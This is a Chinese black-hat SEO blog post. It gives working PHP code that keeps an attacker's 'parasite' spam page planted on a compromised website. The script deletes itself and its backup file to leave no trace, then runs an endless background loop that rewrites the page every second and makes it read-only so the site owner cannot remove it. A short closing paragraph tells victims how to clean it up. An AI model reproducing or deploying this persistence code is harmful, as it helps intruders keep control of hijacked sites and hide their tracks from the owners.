广东seo培训:黑帽寄生虫防删除代码

作者: 黑帽SEO少校 分类: 渗透劫持,黑帽寄生虫 发布时间: 2019-04-27 00:22:34

黑帽寄生虫程序和教程在之前文章已经讲过,有兴趣可以去看:https://www.0116.net/hmjsc/47/ 今天将之前的寄生虫稍微深入一点,做完寄生虫后,对寄生虫文件进行锁定防删除。原理是利用文件占用,造成站长删除不掉,站长修改会恢复成锁定前的状态。使用方法如下:

比如:你的寄生虫文件已经做好 文件名为 jsc.php 然后你就在同一目录下新建一个huifu.txt 用来备份你的寄生虫内容,把jsc.php里面的所有代码全部复制一份到huifu.txt里面保存。然后新建一个lock.php内容代码配置如下

<?php
@unlink($_SERVER['SCRIPT_FILENAME']); //删除自身
error_reporting(0); //禁用错误报告
ignore_user_abort(true); //忽略与用户的断开,用户浏览器断开后继续执行
set_time_limit(0); //执行不超时

$js = 'clock.txt'; //用来判断是否终止执行锁定(解锁)的文件标记
$mb = 'jsc.php'; //要锁定的文件路径
$rn = 'huifu.txt'; //要锁定的内容
$nr = file_get_contents($rn); //从文件中读取要锁定的内容
@unlink($rn); //删除“要锁定的文件内容”,不留痕迹

//创建一个后台执行的死循环
while (1==1) {
    //先判断是否需要解除锁定,防止后台死循环造成各种冲突
    if (file_exists($js)) {
        @unlink($js); //删除解锁文件
        exit(); //终止程序
    }
    else {
        @unlink($mb); //先删除目标文件
        chmod($mb, 0777);  //设置属性
        @unlink($mb); //先删除目标文件
        file_put_contents($mb, $nr); //锁定内容 //$fk = fopen($mb, w); fwrite($fk, $nr); fclose($fk);
        chmod($mb, 0444);  //设置属性
        usleep(1000000); //等待1秒
    }
};
?>

然后执行lock.php 打开是空白 只要打开了就可以了 你会发现huifu.txt 和lock.php已经隐藏掉了。然后随便删除、修改你的jsc.php,都会恢复成锁定之前的状态。

如果需要解锁,只要新建一个clock.txt即可。简单好用,如果自己的网站遇到这样的情况要如何处理?因为猜不到对方设置的解锁文件名,所以直接停用php和运行环境,然后占用就会停止,直接删,然后显示隐藏文件找到源文件全都删掉就可以了。

最近都不知道要更新什么内容,如果有急需的问题或者需要的内容可以留言反馈给我,我看到留言会安排近期更新。

本文由黑帽seo原创发布,转载请注明出处: https://www.0116.net/hmjsc/134/

发表评论

电子邮件地址不会被公开。

更多阅读